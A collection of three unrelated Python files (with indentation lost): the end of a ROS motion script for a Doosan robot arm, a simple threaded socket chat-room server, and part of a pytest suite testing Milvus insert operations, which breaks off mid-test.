print(" disconnected : %d" % (msg.disconnected))
msgRobotState_cb.count = 0
def thread_subscriber():
rospy.Subscriber('/'+ROBOT_ID +ROBOT_MODEL+'/state', RobotState, msgRobotState_cb)
rospy.spin()
#rospy.spinner(2)
if __name__ == "__main__":
rospy.init_node('dsr_service_motion_simple_py')
rospy.on_shutdown(shutdown)
t1 = threading.Thread(target=thread_subscriber)
t1.daemon = True
t1.start()
pub_stop = rospy.Publisher('/'+ROBOT_ID +ROBOT_MODEL+'/stop', RobotStop, queue_size=10)
set_velx(30,20) # set global task speed: 30(mm/sec), 20(deg/sec)
set_accx(60,40) # set global task accel: 60(mm/sec2), 40(deg/sec2)
velx=[50, 50]
accx=[100, 100]
p1= posj(0,0,0,0,0,0) #joint
p2= posj(0.0, 0.0, 90.0, 0.0, 90.0, 0.0) #joint
x1= posx(400, 500, 800.0, 0.0, 180.0, 0.0) #task
x2= posx(400, 500, 500.0, 0.0, 180.0, 0.0) #task
c1 = posx(559,434.5,651.5,0,180,0)
c2 = posx(559,434.5,251.5,0,180,0)
q0 = posj(0,0,0,0,0,0)
q1 = posj(10, -10, 20, -30, 10, 20)
q2 = posj(25, 0, 10, -50, 20, 40)
q3 = posj(50, 50, 50, 50, 50, 50)
q4 = posj(30, 10, 30, -20, 10, 60)
q5 = posj(20, 20, 40, 20, 0, 90)
qlist = [q0, q1, q2, q3, q4, q5]
x1 = posx(600, 600, 600, 0, 175, 0)
x2 = posx(600, 750, 600, 0, 175, 0)
x3 = posx(150, 600, 450, 0, 175, 0)
x4 = posx(-300, 300, 300, 0, 175, 0)
x5 = posx(-200, 700, 500, 0, 175, 0)
x6 = posx(600, 600, 400, 0, 175, 0)
xlist = [x1, x2, x3, x4, x5, x6]
X1 = posx(370, 670, 650, 0, 180, 0)
X1a = posx(370, 670, 400, 0, 180, 0)
X1a2= posx(370, 545, 400, 0, 180, 0)
X1b = posx(370, 595, 400, 0, 180, 0)
X1b2= posx(370, 670, 400, 0, 180, 0)
X1c = posx(370, 420, 150, 0, 180, 0)
X1c2= posx(370, 545, 150, 0, 180, 0)
X1d = posx(370, 670, 275, 0, 180, 0)
X1d2= posx(370, 795, 150, 0, 180, 0)
seg11 = posb(DR_LINE, X1, radius=20)
seg12 = posb(DR_CIRCLE, X1a, X1a2, radius=21)
seg14 = posb(DR_LINE, X1b2, radius=20)
seg15 = posb(DR_CIRCLE, X1c, X1c2, radius=22)
seg16 = posb(DR_CIRCLE, X1d, X1d2, radius=23)
b_list1 = [seg11, seg12, seg14, seg15, seg16]
while not rospy.is_shutdown():
movej(p2, vel=100, acc=100)
movejx(x1, vel=30, acc=60, sol=0)
movel(x2, velx, accx)
movec(c1, c2, velx, accx)
movesj(qlist, vel=100, acc=100)
movesx(xlist, vel=100, acc=100)
move_spiral(rev=9.5,rmax=20.0,lmax=50.0,time=20.0,axis=DR_AXIS_Z,ref=DR_TOOL)
move_periodic(amp =[10,0,0,0,30,0], period=1.0, atime=0.2, repeat=5, ref=DR_TOOL)
moveb(b_list1, vel=150, acc=250, ref=DR_BASE, mod=DR_MV_MOD_ABS)
print('good bye!')
|
Server.py
|
import socket
from threading import Thread
import time
data = open("../assets/version.txt" , "r").read()
print("Chat Room 101 | " + data)
time.sleep(1)
clients = {}
addresses = {}
host = socket.gethostname()
ip = socket.gethostbyname(host)
port = 8080
s = socket.socket()
s.bind((host,port))
print(host, ip)
print("Ask clients to enter host IP as :",ip,"and port as :",port)
def accept_client():
while (True):
client_con,client_address=s.accept()
client_con.send("Hey! Welcome to the Chat Room. Enter Your Name To Continue.".encode("utf8"))
addresses[client_address] = client_address
Thread(target=handle_client, args=(client_con, client_address)).start()
print(client_address, "Has Connected")
def broadcast(message, prefix=""):
for x in clients:
x.send(bytes(prefix, "utf8") +message)
def handle_client(con,adr):
name = con.recv(1024).decode("utf8")
welcome_message = "Thanks for using this Chat Room " + name + ". You can use #quit if you want to exit"
con.send(bytes(welcome_message, "utf8"))
print(name,"has joint the chat")
message = name + " has joint the chat!"
broadcast(bytes(message, "utf8"))
clients[con] = name
try:
while(True):
message = con.recv(1024)
if(message != bytes("#quit", "utf8")):
broadcast(message, name + ": ")
else:
con.close()
del clients[con]
broadcast(bytes(name + " has left the chat.", "utf8"))
except:
print(name + " has left the chat")
if __name__ == "__main__":
s.listen()
print("The Server Is Now Online")
t1 = Thread(target=accept_client)
t1.start()
t1.join() # Waits for one thread to stop before running the next.
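# A minimal client sketch for this server (illustrative only; replace the IP
# with the value the server prints at startup):
#   import socket
#   c = socket.socket()
#   c.connect(('<server-ip>', 8080))
#   print(c.recv(1024).decode('utf8'))       # welcome prompt
#   c.send(bytes('alice', 'utf8'))           # the first message is taken as the name
#   c.send(bytes('hello everyone', 'utf8'))  # relayed to all clients as "alice: hello everyone"
#   c.send(bytes('#quit', 'utf8'))           # asks the server to drop this client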
|
test_insert.py
|
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
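# default_single_query above follows the boolean search DSL used by these
# tests: a top-level "bool.must" list whose vector clause is keyed by the
# vector field name and carries topk, the query vectors, metric_type and the
# index-specific search params (here nprobe).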
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
logging.getLogger().info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
"""
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
"""
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
"""
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
"""
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
"""
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
"""
collection_name = gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
"""
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
"""
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
"""
target: test dropping the collection after entities have been inserted and flushed
method: insert entities, flush, and drop the collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
"""
target: test building an index after inserting entities
method: insert entities and build index
expected: no error raised
"""
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
"""
target: test inserting entities after building an index
method: build index, then insert entities
expected: no error raised
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
"""
target: test searching entities after they have been inserted
method: insert entities, flush, load and search the collection
expected: no error raised
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
nb = default_segment_row_limit + 1
result = connect.insert(collection, gen_entities(nb))
connect.flush([collection])
assert len(result.primary_keys) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection, using customized ids
method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
expected: the returned ids have the expected length and the collection row count equals the insert count
"""
nb = insert_count
ids = [i for i in range(nb)]
entities = gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
"""
target: test insert vectors in collection, using the same customized id for all entities
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the returned ids have the expected length and the collection row count equals the insert count
"""
nb = insert_count
ids = [1 for i in range(nb)]
entities = gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test creating normal collections with different fields and inserting entities with customized ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
"""
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = gen_entities_by_fields(fields["fields"], nb, default_dim, ids)
logging.getLogger().info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection without ids
method: create id_collection and insert entities without ids
expected: exception raised
"""
nb = insert_count
with pytest.raises(Exception) as e:
entities = gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
"""
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
"""
target: check the result of insert into id_collection without ids
method: insert entities without ids into id_collection
expected: error raised
"""
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the returned primary keys equal to the customize ids
"""
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_default_partition(self, connect, collection):
"""
target: test insert entities into default partition
method: insert entities into collection with the default partition_name param
expected: the collection row count equals to nb
"""
result = connect.insert(collection, default_entities, partition_name=default_partition_name)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
tag = gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatedly, with the partition_name param
expected: the collection row count equals to 2 * nb
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
"""
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
"""
vectors = gen_vectors(default_nb, int(default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
"""
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
"""
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
"""
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
"""
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
"""
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
"""
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
"""
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
"""
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
"""
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
"""
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
"""
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
"""
delete_nums = 500
disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
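"""
******************************************************************
The following cases are used to test `insert` function with binary collections
******************************************************************
"""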
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_entities(self, connect, binary_collection):
"""
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self, connect, binary_collection):
"""
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_multi_times(self, connect, binary_collection):
"""
target: test insert entities multiple times and flush at the end
method: create collection, insert binary entity multiple times, and flush at the end
expected: the collection row count equals to nb
"""
for i in range(default_nb):
result = connect.insert(binary_collection, default_binary_entity)
assert len(result.primary_keys) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
"""
connect.create_index(binary_collection, binary_field_name, get_binary_index)
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test build index after insert vector
method: insert vector and build index
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_search(self, connect, binary_collection):
"""
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1,
metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert len(res[0]) == default_top_k
class TestInsertAsync:
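"""
******************************************************************
The following cases are used to test `insert` function with async mode
******************************************************************
"""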
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
result = connect.insert(collection, gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 50000
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
"""
target: test insert entities async with a short timeout
method: insert a large number of entities async with timeout=1 and an error callback
expected: exception raised when getting the result
"""
nb = 100000
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_invalid_params(self, connect):
"""
target: test insert entities async into a non-existent collection
method: insert entities async with a collection name that was never created
expected: exception raised when getting the result
"""
collection_new = gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
"""
target: test insert entities async with invalid params
method: insert an empty entities list async
expected: exception raised when getting the result
"""
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_multi_collections(self, connect):
"""
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: the row count of each collection equals to nb
"""
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(result.primary_keys) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_insert_entity_another(self, connect, collection):
"""
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
result = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(result.primary_keys) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection_name, default_entity)
assert len(result.primary_keys) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
"""
target: test create index for collection_2 after insert vector to collection_1
method: insert vector and build index
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
"""
target: test create index for collection_2 a while after insert vector to collection_1
method: insert vector and build index
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_search_entity_insert_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
